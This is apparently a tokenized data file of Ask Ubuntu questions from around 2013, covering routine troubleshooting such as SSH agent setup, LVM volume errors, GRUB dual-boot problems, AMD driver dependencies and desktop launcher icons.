parameter block . operating system : boot files : sda4 : __________________________________________ file system : ext4 boot sector type : grub2 ( v1.99-2.00 ) boot sector info : grub2 ( v1.99 ) is installed in the boot sector of sda4 and looks at sector 36725144 of the same hard drive for core.img . core.img is at this location and looks in partition 94 for . operating system : ubuntu 13.04 boot files : /boot/grub/grub.cfg /etc/fstab /boot/grub/i386-pc/core.img
308044	unlocking keyring opens browser	when i start up my computer ( ubuntu 12.10 ) , it asks to unlock my keyring . after unlocking my browser ( chrome ) opens two `` about : blank '' tabs out of nowhere . if i already had the browser open , it just opens the two new tabs next to the existing ones . chrome is configured to open only the new tab page , google cloud print is off and i unchecked the `` continue running background apps when google chrome is closed '' options . i looked in startup applications ( and i 'unhid ' the entries in /etc/xdg/autostart ) but i could n't find it there . how do i fix this ? it 's not really a big problem , but it 's annoying . and i do n't want my system to have quirks like this .
308045	differences between /bin , /sbin , /usr/bin , /usr/sbin , /usr/local/bin , /usr/local/sbin	i 'm running an ubuntu server 13.04 , but i see the same on a 12.04 : i have six directories with command files . these are : /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin what are the differences between these ? for example : if i 'm writing my own scripts , where should i add these ?
308047	reading an object file	i have installed a gcc compiler that is compatible another processor ( not the one i am using ) . when i use the objdump command to read the object file i get the following , objdump -d one.o one.o : file format elf32-big objdump : ca n't disassemble for architecture unknown ! where is the problem ? is this because i am using a gcc compatible with some other processor ? ? or is there any other way to read an object file ?
308053	routine program in ubuntu	i am trying to write a routine of my studies of next month . for that i want to write a timed schedule . that is a timed program that will tell me everytime i turn on my laptop which topics should i read at that date . i can divide a day into 3 parts : 8am-2pm , 2pm-6pm and 6pm-8am . and now i do n't want any routine softwares , i want to write that program myself . all i am asking is what language should i know before i can write this program ? ? ? should i learn shell scripting ? i know a bit of c++ , will that help ?
308054	how to create .s.pgsql.5432 ?	i installed postgresql 9 . by mistake , i deleted the .s.pgsql.5432 . now i cant able to add server from pgadmin . i do n't have any server in on . how to create .s.pgsql.5432 ? no such file or directory is the server running locally and accepting connections on unix domain socket `` /var/run/postgresql/.s.pgsql.5432 '' ? , i already tried below code in terminal but not working . pg_ctl reload please someone help us to resolve this problem
308055	ssh ids are forgotten on logout	i 'm having trouble setting up ssh public key authentication . i want to use this to backup my server to a backup server with ssh . i will do this automatically with a cronjob , so i ca n't type in the passphrase or so . what i did : make a key with ssh-keygen copy the key to the backup server with ssh-copy-id start the ssh agent with ssh-agent bash add the key to the agent with ssh-add verify this with ssh-add -l - the key was added verify everything - it worked i did all this using root ( via sudo -s ) on the main server and my own user at the backup server . however , now i logged out from sudo on the main server and logged back in ( to root , with sudo ) . when i tried opening a connection with my key ( ssh -i the-key the-user @ the-host ) , i have to type in the passphrase again ! so i runned ssh-add -l and got : could not open a connection to your authentication agent how can i set up it that way that i never have to type in the passphrase again ? here 's ssh -vvv the-user @ the-host : root @ cs : / # ssh -vvv camilstaps @ 62.234.74.186 openssh_6.1p1 debian-4 , openssl 1.0.1c 10 may 2012 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to 62.234.74.186 [ 62.234.74.186 ] port 22. debug1 : connection established . debug1 : permanently_set_uid : 0/0 debug3 : incorrect rsa1 identifier debug3 : could not load `` /.ssh/id_rsa '' as a rsa1 public key debug1 : identity file /.ssh/id_rsa type 1 debug1 : checking blacklist file /usr/share/ssh/blacklist.rsa-2048 debug1 : checking blacklist file /etc/ssh/blacklist.rsa-2048 debug1 : identity file /.ssh/id_rsa-cert type -1 debug1 : remote protocol version 2.0 , remote software version openssh_5.9p1 debian-5ubuntu1.1 debug1 : match : openssh_5.9p1 debian-5ubuntu1.1 pat openssh_5* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_6.1p1 debian-4 debug2 : fd 3 setting o_nonblock debug3 : load_hostkeys : loading entries for host `` 62.234.74.186 '' from file `` /root/.ssh/known_hosts '' debug3 : load_hostkeys : found key type ecdsa in file /root/.ssh/known_hosts:1 debug3 : load_hostkeys : loaded 1 keys debug3 : order_hostkeyalgs : prefer hostkeyalgs : ecdsa-sha2-nistp256-cert-v01 @ openssh.com , ecdsa-sha2-nistp384-cert-v01 @ openssh.com , ecdsa-sha2-nistp521-cert-v01 @ openssh.com , ecdsa-sha2-nistp256 , ecdsa-sha2-nistp384 , ecdsa-sha2-nistp521 debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug2 : kex_parse_kexinit : ecdh-sha2-nistp256 , ecdh-sha2-nistp384 , ecdh-sha2-nistp521 , diffie-hellman-group-exchange-sha256 , diffie-hellman-group-exchange-sha1 , diffie-hellman-group14-sha1 , diffie-hellman-group1-sha1 debug2 : kex_parse_kexinit : ecdsa-sha2-nistp256-cert-v01 @ openssh.com , ecdsa-sha2-nistp384-cert-v01 @ openssh.com , ecdsa-sha2-nistp521-cert-v01 @ openssh.com , ecdsa-sha2-nistp256 , ecdsa-sha2-nistp384 , ecdsa-sha2-nistp521 , ssh-rsa-cert-v01 @ openssh.com , ssh-dss-cert-v01 @ openssh.com , ssh-rsa-cert-v00 @ openssh.com , ssh-dss-cert-v00 @ openssh.com , ssh-rsa , ssh-dss debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-512 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-512 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : none , zlib @ openssh.com , zlib debug2 : kex_parse_kexinit : none , zlib @ openssh.com , zlib debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : first_kex_follows 0 debug2 : kex_parse_kexinit : reserved 0 debug2 : kex_parse_kexinit : ecdh-sha2-nistp256 , ecdh-sha2-nistp384 , ecdh-sha2-nistp521 , diffie-hellman-group-exchange-sha256 , diffie-hellman-group-exchange-sha1 , diffie-hellman-group14-sha1 , diffie-hellman-group1-sha1 debug2 : kex_parse_kexinit : ssh-rsa , ssh-dss , ecdsa-sha2-nistp256 debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-256-96 , hmac-sha2-512 , hmac-sha2-512-96 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-256-96 , hmac-sha2-512 , hmac-sha2-512-96 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : none , zlib @ openssh.com debug2 : kex_parse_kexinit : none , zlib @ openssh.com debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : first_kex_follows 0 debug2 : kex_parse_kexinit : reserved 0 debug2 : mac_setup : found hmac-md5 debug1 : kex : server- > client aes128-ctr hmac-md5 none debug2 : mac_setup : found hmac-md5 debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : sending ssh2_msg_kex_ecdh_init debug1 : expecting ssh2_msg_kex_ecdh_reply debug1 : server host key : ecdsa 24:60:36:95 : d8:3f:04 : b0:20:94:6b : a9:98 : bf:22:1b debug3 : load_hostkeys : loading entries for host `` 62.234.74.186 '' from file `` /root/.ssh/known_hosts '' debug3 : load_hostkeys : found key type ecdsa in file /root/.ssh/known_hosts:1 debug3 : load_hostkeys : loaded 1 keys debug1 : host '62.234.74.186 ' is known and matches the ecdsa host key . debug1 : found key in /root/.ssh/known_hosts:1 debug1 : ssh_ecdsa_verify : signature correct debug2 : kex_derive_keys debug2 : set_newkeys : mode 1 debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug2 : set_newkeys : mode 0 debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug2 : service_accept : ssh-userauth debug1 : ssh2_msg_service_accept received debug2 : key : /.ssh/id_rsa ( 0x7f4a9ecf0810 ) debug1 : authentications that can continue : publickey , password debug3 : start over , passed a different list publickey , password debug3 : preferred gssapi-keyex , gssapi-with-mic , publickey , keyboard-interactive , password debug3 : authmethod_lookup publickey debug3 : remaining preferred : keyboard-interactive , password debug3 : authmethod_is_enabled publickey debug1 : next authentication method : publickey debug1 : offering rsa public key : /.ssh/id_rsa debug3 : send_pubkey_test debug2 : we sent a publickey packet , wait for reply debug1 : server accepts key : pkalg ssh-rsa blen 279 debug2 : input_userauth_pk_ok : fp fe:2f:03:4a:68 : c0 : ce : b1 : e9 : b5:74:9c : c5 : cb : f5:1f debug3 : sign_and_send_pubkey : rsa fe:2f:03:4a:68 : c0 : ce : b1 : e9 : b5:74:9c : c5 : cb : f5:1f debug1 : key_parse_private_pem : pem_read_privatekey failed debug1 : read pem private key done : type < unknown > enter passphrase for key '/.ssh/id_rsa ' : and this is the relevant part of /var/log/auth.log on the server side : jun 14 10:06:30 laptop-camil sshd [ 2265 ] : pam_unix ( sshd : auth ) : authentication failure ; logname= uid=0 euid=0 tty=ssh ruser= rhost=vivisoft.nl user=camilstaps jun 14 10:06:34 laptop-camil sshd [ 2265 ] : connection closed by 164.138.27.37 [ preauth ] this is what i get when i run nohup ssh-agent bash & ( see the comments ) : root @ cs : ~ # nohup ssh-agent bash & [ 1 ] 1287 root @ cs : ~ # nohup : ignoring input and appending output to 창nohup.out창 < here is an empty line with the cursor > for some reason , the output of nohup is put on the next line , and a new line is added .
308062	gnome 2 does not start in ubuntu linux 12.04 after login though installation is complete	i have a pc with only 512 mb ram . ubuntu linux has installed successfully . instead of the default unity desktop i need to use the gnome desktop . i have done the installation of the desktop and logged out . however , after logging in , the desktop is the unity interface . what do i need to do to use gnome 2 successfully . please give a step by step solution . thanks .
308067	how to run a script after or before hibernate	i want to run a 4 commands before a hibernate and another 2 commands after update . is it also possible to arrange the time/squence of each commands , if yes then could you explain how ?
308075	how to optimize power consumption for ivy bridge ?	i 'm new in ubuntu 13.04 and wondering what i should do to get the lowest power consumption settings for an ivy bridge cpu . are there any changes to make in the terminal or something ?
308081	( solved ) how do you configure snes9x-gtk joypad 2 ? [ lubuntu 13.04 ]	hello ubuntu community , i am trying to play snes9x-gtk with two players using ps3 dualshock . my problem is the input configuration for player 2 . it will not register my button presses for js1 . js0 works fine . jtest for joystick calibrating shows both controllers working .
308088	how to make a centred , wrapped and padded container of elements in qml ?	i am trying to achieve an element which is vertically and horizontally centered on the page , has padded margins , and elements inside it are equally spaced and centered & wrapped ( if needed ) . so in essence i 'm trying to achive something like this : but unfortunately , when the screen shrinks , the text does n't preserve padding , nor stars to wrap . ideally i 'd want a one unit padding around both paragraphs of text & one unit spacing between the two paragraphs and all of them centred/wrapped . i 've tried calculating & setting width/height properties , but they did n't do anything . here is my code : tab { objectname : `` tab2 '' title : i18n.tr ( `` title '' ) page : page { anchors.fill : parent item { anchors.centerin : parent text { id : text1 text : `` orem ipsum dolor sit amet , consectetur adipiscing elit . fusce in mollis purus '' wrapmode : text.wrap width : parent.width horizontalalignment : text.alignhcenter } text { text : `` etiam sagittis fringilla quam , eget accumsan libero pulvinar ac . '' wrapmode : text.wrap width : parent.width anchors { top : text1.bottom topmargin : units.gu ( 2 ) } horizontalalignment : text.alignhcenter } } } }
308091	ubuntu scanning internet traffic ?	can ubuntu scann all internet traffic in my office ? i have 10 employees with windows desktops and i would like to know which internet websites are they visiting . i have ubuntu desktop 13.04 at this moment installed on my old desktop pc . how can i set up this ?
308098	how to run compiled c++ program on startup ?	i have compiled and made an exucutable c++ program in ubuntu.but it only runs in terminal.that is i have to give the ./example command in terminal.if i click it nothing happens and says no suitable apps . now what should i do to run this program on startup . ? even if it is in the terminal not in x-term that would do . but i have to start this program on every startup . i tried this command , but nothing happens on startup , gnome-terminal -e `` ./routine '' -- working-directory `` /home/tamim '' .
308106	how to remotely backup a mysql database ?	how to backup mysql database in a remote location using rsync ? i tried mysqldump but it is storing the backup in the local machine only . also i need the backup files to be stored in tar format in the remote location . is there any way to combine rsync and mysqldump to store the backup in a remote system in tar format ?
308107	cant ssh localhost	i ca n't ssh localhost . i have installed openssh server as well on my ubuntu 12.04 lts ( 32 bit ) . connected to net ( ip : 192.168.1.2 ) installed hadoop , running hadoop for local machine . here 's what i get : root @ kunal-extensa-4620 : / # ssh -vvv localhost openssh_5.9p1 debian-5ubuntu1.1 , openssl 1.0.1 14 mar 2012 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to localhost [ 127.0.0.1 ] port 22. debug1 : connection established . debug1 : permanently_set_uid : 0/0 debug1 : identity file /root/.ssh/id_rsa type -1 debug1 : identity file /root/.ssh/id_rsa-cert type -1 debug1 : identity file /root/.ssh/id_dsa type -1 debug1 : identity file /root/.ssh/id_dsa-cert type -1 debug1 : identity file /root/.ssh/id_ecdsa type -1 debug1 : identity file /root/.ssh/id_ecdsa-cert type -1 debug1 : remote protocol version 2.0 , remote software version openssh_5.9p1 debian-5ubuntu1.1 debug1 : match : openssh_5.9p1 debian-5ubuntu1.1 pat openssh* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_5.9p1 debian-5ubuntu1.1 debug2 : fd 3 setting o_nonblock debug3 : load_hostkeys : loading entries for host `` localhost '' from file `` /root/.ssh/known_hosts '' debug3 : load_hostkeys : loaded 0 keys debug1 : ssh2_msg_kexinit sent read from socket failed : connection reset by peer
308108	conflict between my lamp server and apache tomcat	i recently installed apache tomcat on my existing lamp webserver ubuntu which runs on port 80. before i start tomcat , i made absolutely sure to change its port number to avoid conflict on my lamp . < connector port= '' 8181 '' protocol= '' http/1.1 '' connectiontimeout= '' 20000 '' uriencoding= '' utf-8 '' redirectport= '' 8443 '' / > then i start tomcat service tomcat7 start root @ webserver : /usr/lib/jvm # service tomcat7 start * starting tomcat servlet engine tomcat7 [ ok ] hoping to see my default tomcat apache web by going to http : // < ip > :8181 but it doesnt load the page . i also tried checking my lamp server http : // < ip > :80 it doesnt load the page either . now , when i turn off my my apache tomcat , my lamp doesnt load anymore.. is there anything i could do about this ? or how do i approach on troubleshooting this..
308109	contents of localhost are gone	i install xampp in my ubuntu 12.10 . after installation i deleted index.php inside /opt/lampp/htdocs then i sudo chmod 777 -r /opt/lampp/htdocs to create a folder and place my htmls after i placed my files i sudo chmod 775 -r /opt/lampp/htdocs it was running initially when i typed localhost the files within htdocs appeared but when i opened it again ( after shutting down my laptop ) it was gone . all i can see is index of/ name lastmodified size description apache/2.2.22 ( ubuntu ) server at localhost port80 please help .
308113	trying to upload files from mac to ubuntu one	i have mac os x ubuntu and have shared the folders on my system and put the files i want to share in to and shared them and synced them and everything.. it constantly says it syncing but the files i have put in their are neve online or available . i have also tried to upload using web browser this does n't work either .
308116	in all sites i have a non-physical look ubuntu 12.10	i have a problem with browsing ( i tried only with firefox ) . im many sites ( usually in stackexchange sites ) i have no ( or part of the ) icons . i can not view a screenshot because i do not have enough rep. system details : ubuntu 12.10 unknown graphics card ( nvidia ) i often need to scroll down very much . screenshot : can not add . any help would be appropriate . edit : i can still click links even if they look like text ( unfortunately not in askubuntu ) .
308125	not able to boot ubuntu after installation of it alongside windows 7 completes !	i have installed ubuntu 13.04 along side windows 7 using the something else option . i had kept 20 gb of unallocated space . after selecting the `` something else '' option , i created a partition of 15 gb with : file system ext4 mount `` / '' and 5 gb for swap after installation completed , it asked for a restart , so i did ! but now it only boots into windows 7 . there is no option to start ubuntu ! ! anybody know about this problem ? ? ?
308128	“failed to load platform plugin ”xcb“ ” while launching qt5 app on linux without qt installed	i wrote application for linux which uses qt5 . but when i am trying to launch it on the linux without qt sdk installed , the output in console is : failed to load platform plugin `` xcb '' . available platforms are : how can i fix this ? may be i need to copy some plugin file ? when i use ubuntu with qt5 installed , but i rename qt directory , the same problem occurs . so , it uses some file from qt directory ... i have found file libqxcb.so in the qt sdk directory , but placing it in the /usr/lib does not help .
308131	seamless upgrade virtualbox from 4.2.0to 4.2.12	i downloaded `` ubuntu 12.04 lts ( `` precise pangolin '' ) amd64 '' from vb download page using ubuntu software center to upgrade but it says : conflicts with the installed package 'virtualbox-guest-additions-iso' normaly i 'm using apt-get but that do n't work for vb . can you share information how to upgrade vb 4.2.0 - > 4.2.2 ?
308135	why wo n't this video work on ubuntu 12.04 ?	i just installed ubuntu 12.04 lts on my laptop and i have been trying to see this clip but it does not work : http : //www.tvrplus.ro/editie-tv-bac-44931 this is a video from romania 's national television website . nothing to worry about . i tried installing flash and the package for rtmpdump from the software center . could you please help me work it out ? thank you ! edit -- thank you for answering so quickly ! i do n't understand why it does not work for me . i have to mention that i literally just installed ubuntu a couple of hours ago and maybe i have n't installed all the other stuff that needs to be installed in order to play those types of videos . i have the flash plugin installed and it does not work..is there something else i need to install in order to get it to play ? thank you again !
308136	grub bootloader : windows 8 selection not working	i dual boot windows 8 with ubuntu 12.10 , and when i turn on my laptop , i see the grub bootloader which is fine . i see options for ubuntu , advanced ubuntu options , memory test stuff , and finally windows 8 ( loader ) . when i select windows 8 ( loader ) , instead of going to the windows 8 loader , i simply see the grub bootloader again . it 's kinda like i have the `` option '' to pick windows 8 , but grub does n't like that option . has anyone encountered/solved this problem ? any help will be greatly appreciated ! thanks , kyle
308139	i want to delete warty-final-ubuntu.png	i 've seen many stuff here about it but all i want to do is delete this big 2 mb image which loads everytime my ubuntu boots . as the general law says these things slows down the system . on boot it flashes and then get changed to my current desktop wallpaper . i do n't want it anymore . may be i want to add this light weight image instead of it . or ca n't i just get rid of it completely and only my desktop wallpaper is used in the login screen background ?
308141	weird hostname resolving to my localhost	ubuntu 12.04 lts . hi , when i ping two specific domain names ( i 'll just call them foo.net and foo.org ) they both resolve to my localhost . i am on my home network and resolve.conf has 127.0.0.1 as name server . it 's also only my host that has this problem , my vms and brothers machine do n't resolve the name at all . also , when i type foo.net or foo.org into my browser , it sends me to my local apache server root . i tried other random names but only those two are resolving to localhost , everything else seems to work normal . /etc/hosts and /etc/resolv.conf look normal , although i 'm not an expert on either . dig shows the correct dns server and the answer comes out to my loopback address . tracepath completes at localhost with one hop . not sure what 's going on .
308154	ca n't mount btrfs on boot	i have a server running ubuntu 12.04 ( with a 3.8.13 kernel ) that fails to boot if i include in /etc/fstab a mount point for a btrfs volume : /dev/sda3 /home btrfs defaults , compress=lzo , noatime , discard 0 0 this is a raid1 volume : # btrfs filesystem show label : none uuid : 07489dd8-096a-43a3-9653-55c5948e83a3 total devices 2 fs bytes used 13.27gb devid 1 size 91.76gb used 16.03gb path /dev/sda3 devid 2 size 91.76gb used 16.01gb path /dev/sdb3 dmesg shows this : device fsid 07489dd8-096a-43a3-9653-55c5948e83a3 devid 1 transid 125 /dev/sda3 btrfs : use lzo compression btrfs : use lzo compression btrfs : failed to read the system array on sda3 btrfs : open_ctree failed i have to manually run btrfs device scan . after that it works fine . any suggestions on how to fix this ?
308155	video edition program that can make several hours long clips from a picture and mp3 files on resolution 480p with only 1 fps	i need a video edition program for ubuntu 13.04 that can make several hours long clips from a picture and mp3 files on resolution 480p with only 1 fps . i tried some programs but they cant bet set on 1 fps : * (
308160	is it possible for 2 users to work at the same time , one is connected remotely ? and how to set it up ?	i am running xubuntu on my main pc at home . is it possible for 2 users to work simultaneously on one computer , while one is physically in front of the computer , and another one is connected remotely from another ubuntu pc ? edit : both users need a gui environment . if yes , how do i set it up ? edit 3 : i have a powerful desktop pc ( recently converted to linux : ) ) and 2 laptops . the desktop pc has a vm with all the graphic design software on it . me and my friend both work on a web project , and the laptops are not suitable for it . the laptop is good for development , but every now and then i need to access the graphical design software , so i need the desktop . my friend works on linux graphics tools and also needs the desktop . so we decided to share the desktop , while he will be working on it directly , i would like to connect to it from my laptop to access the vm . desktop and laptop are in one lan . edit2 : thanks , for the comments and answers , i got on track with this . a quick search revealed 2 options : ssh-x or `` x11 forwarding via ssh '' ( as you already pointed out ) freenx which direction would you recommend ? or a better alternative if you know one . sorry for bad explanation , i do n't have good writing skills .
308162	issue with lvm not able to add new drives	fdisk , lv/pv/vgdisplay : anubis @ anubis : ~ $ sudo fdisk -l [ sudo ] password for anubis : disk /dev/sda : 500.1 gb , 500107862016 bytes 45 heads , 63 sectors/track , 344540 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x1b231dca device boot start end blocks id system /dev/sda1 2048 976773167 488385560 8e linux lvm disk /dev/sdb : 500.1 gb , 500107862016 bytes 45 heads , 63 sectors/track , 344540 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x85e38cb4 device boot start end blocks id system /dev/sdb1 2048 976773167 488385560 8e linux lvm disk /dev/sdc : 1000.2 gb , 1000204886016 bytes 81 heads , 63 sectors/track , 382818 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x6b680487 device boot start end blocks id system /dev/sdc1 2048 1953525167 976761560 8e linux lvm disk /dev/sdd : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00009d51 device boot start end blocks id system /dev/sdd1 * 2048 195311615 97654784 83 linux /dev/sdd2 195311616 3907029167 1855858776 8e linux lvm disk /dev/mapper/vgpool-storage : 2900.5 gb , 2900499628032 bytes 255 heads , 63 sectors/track , 352632 cylinders , total 5665038336 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 disk /dev/mapper/vgpool-storage does n't contain a valid partition table anubis @ anubis : ~ $ sudo lvdisplay -- - logical volume -- - lv name /dev/vgpool/storage vg name vgpool lv uuid c56qjd-x92x-hguj-1b3n-ooun-ddbe-fo1fn0 lv write access read/write lv status available # open 0 lv size 2.64 tib current le 691533 segments 2 allocation inherit read ahead sectors auto - currently set to 256 block device 252:0 anubis @ anubis : ~ $ sudo vgdisplay -- - volume group -- - vg name vgpool system id format lvm2 metadata areas 2 metadata sequence no 20 vg access read/write vg status resizable max lv 0 cur lv 1 open lv 0 max pv 0 cur pv 2 act pv 2 vg size 2.64 tib pe size 4.00 mib total pe 691556 alloc pe / size 691533 / 2.64 tib free pe / size 23 / 92.00 mib vg uuid xageo7-kfnx-ew9z-qfen-aqzz-26fv-ydlr8d anubis @ anubis : ~ $ sudo pvdisplay -- - physical volume -- - pv name /dev/sdc1 vg name vgpool pv size 931.51 gib / not usable 3.00 mib allocatable yes ( but full ) pe size 4.00 mib total pe 238466 free pe 0 allocated pe 238466 pv uuid vgzcil-agyl-nohy-opq7-pc7m-ybdv-qpwhs5 -- - physical volume -- - pv name /dev/sdd2 vg name vgpool pv size 1.73 tib / not usable 2.09 mib allocatable yes pe size 4.00 mib total pe 453090 free pe 23 allocated pe 453067 pv uuid p9pamt-cpad-bs2h-xgcn-9wpu-6c4g-qcpjyl anubis @ anubis : ~ $ sudo vgextend vgpool /dev/sda1 device /dev/sda1 not found ( or ignored by filtering ) . unable to add physical volume '/dev/sda1 ' to volume group 'vgpool ' . sudo pvscan [ sudo ] password for anubis : pv /dev/sdc1 vg vgpool lvm2 [ 931.51 gib / 0 free ] pv /dev/sdd2 vg vgpool lvm2 [ 1.73 tib / 92.00 mib free ] total : 2 [ 2.64 tib ] / in use : 2 [ 2.64 tib ] / in no vg : 0 [ 0 ] i have a volume group setup with two physical volumes . that is working fine , no issues . i am trying to add /dev/sda1 and /dev/sdb1 . both have been partitioned and formatted , as you can see . the first two drives added just fine while the other two just give me an error . i am really at the end of my realm , and i need help . the purpose of this server is mainly as a file server . it is running ubuntu server 12.04.2 four sata drives , 2x 500gb , 1x 1tb , and 1x 2tb . i have a single ext partition on the 2tb for ubuntu and all its needs . the rest i want to use as a large storage place for music movies and photos .
308168	installation i386 ubunto desktop 13.04	i am trying to install `` ubuntu-13.04-desktop-i386.iso '' on a dell optiplex gx270 . i used `` universal-usb-installer-1.9.3.5 '' to get it on an external seagate freeagent usb harddrive . no problem . i attach to seagate to the desired computer to install ubuntu and it boots to the usb with no problem . the screen hangs with the ubuntu logo for a while , then i get the error message : ( initramfs ) unable to find a medium containing a live file system please can anyone help me with this ?
308172	fglrx doesnt find libc6	i have a big problem with amd drivers on ubuntu 13.04 i just generated the catalyst packages for raring using this command ( the problem is not limited to beta 13.6 , it happens with 13.4 version too ) : ./amd-driver-installer-catalyst-13-6-beta-x86.x86_64.run -- buildpkg ubunt/raring everything works fine , but if i try to install them using dpkg -i fglrx*.deb i get the following error : dpkg : dependency problems prevent configuration of fglrx : fglrx depends on libc6-amd64 ( > = 2.3.3 ) . lib6 is installed : dpkg -l | grep libc6 ii libc6 : amd64 2.17-0ubuntu5 amd64 embedded gnu c library : shared libraries ii libc6 : i386 2.17-0ubuntu5 i386 embedded gnu c library : shared libraries ii libc6-amd64 2.17-0ubuntu5 i386 embedded gnu c library : 64bit shared libraries for amd64 ii libc6-dbg : amd64 2.17-0ubuntu5 amd64 embedded gnu c library : detached debugging symbols ii libc6-dev : amd64 2.17-0ubuntu5 amd64 embedded gnu c library : development libraries and header files ii libc6-dev : i386 2.17-0ubuntu5 i386 embedded gnu c library : development libraries and header files ii libc6-dev-i386 2.17-0ubuntu5 amd64 embedded gnu c library : 32-bit development libraries for amd64 ii libc6-dev-x32 2.17-0ubuntu5 amd64 embedded gnu c library : x32 abi development libraries for amd64 ii libc6-i386 2.17-0ubuntu5 amd64 embedded gnu c library : 32-bit shared libraries for amd64 ii libc6-x32 2.17-0ubuntu5 amd64 embedded gnu c library : x32 abi shared libraries for amd64 ii libcompfaceg1 using -- force-all the drivers installs and works fine , but thats not really nice , because apt breaks then .
308177	progress of `` apt-get install ubuntu-desktop '' on mini-board computer ?	i have a new beaglebone black . i wanted to install ubuntu 13.04 in which i have succeeded , but then i wanted a gui , in this case the ubuntu desktop itself . can anyone tell me how long it will take installing the ubuntu-desktop ? it 's been 3 hours of : selecting ... unpacking ... selecting ... unpacking ... etc .
308184	icon assigned in .desktop file is not used when application is loaded and launcher icon appears	i am installing the newer application eclipse juno on ubuntu 12.04 64bit , following this tutorial : http : //www.blogs.digitalworlds.net/softwarenotes/ ? p=54 . i have already installed eclipse indigo in the past ( the already version , found in ubuntu repos ) . note that i may be using the eclipse as an example here , but i have came across this behaviour in other cases too . so , the original eclipse indigo .desktop file is the following : [ desktop entry ] type=application name=eclipse comment=eclipse integrated development environment icon=eclipse exec=eclipse terminal=false categories=development ; ide ; java ; i changed it though a bit for the sake of installing the new eclipse juno side by side with the old one . to the above file became : [ desktop entry ] type=application name= '' eclipse indigo '' # < -- -- -- this changed comment=eclipse integrated development environment icon=eclipse exec=eclipse terminal=false categories=development ; ide ; java ; finally i generate the .desktop file for eclipse juno , not in the way instructed by the guide but with the command gnome-desktop-item-edit -- create-new ~/applications the contents of the file are : # ! /usr/bin/env xdg-open [ desktop entry ] version=1.0 type=application terminal=false icon [ en_us ] =/opt/eclipse/icon.xpm name [ en_us ] =eclipse juno exec=/opt/eclipse/eclipse comment [ en_us ] =eclipse juno 4.2.2 ide name=eclipse juno comment=eclipse juno 4.2.2 ide icon=/opt/eclipse/icon.xpm now starting the application uses the newer juno icon and hovering the icon says ( surely enough ) `` eclipse juno '' . so far , so good . however , if i start the application from the cli , with /opt/eclipse/eclipse , i get the icon of eclipse indigo showing up on the launcher and hovering this icon says `` eclipse indigo '' . however , it is juno that has been started ( which is what i wanted ) . in the following picture , the top icon ( in the red rectangle ) is the eclipse juno . in the bottom icon is again eclipse juno , but started from the command line . thank you for your help . edit : ok , ~/applications is taking more fame than it should . this is just a personal folder to keep applications , binaries and other personal stuff . i created the files in my personal folder and then copied the generated .desktop files in /usr/share/applications .
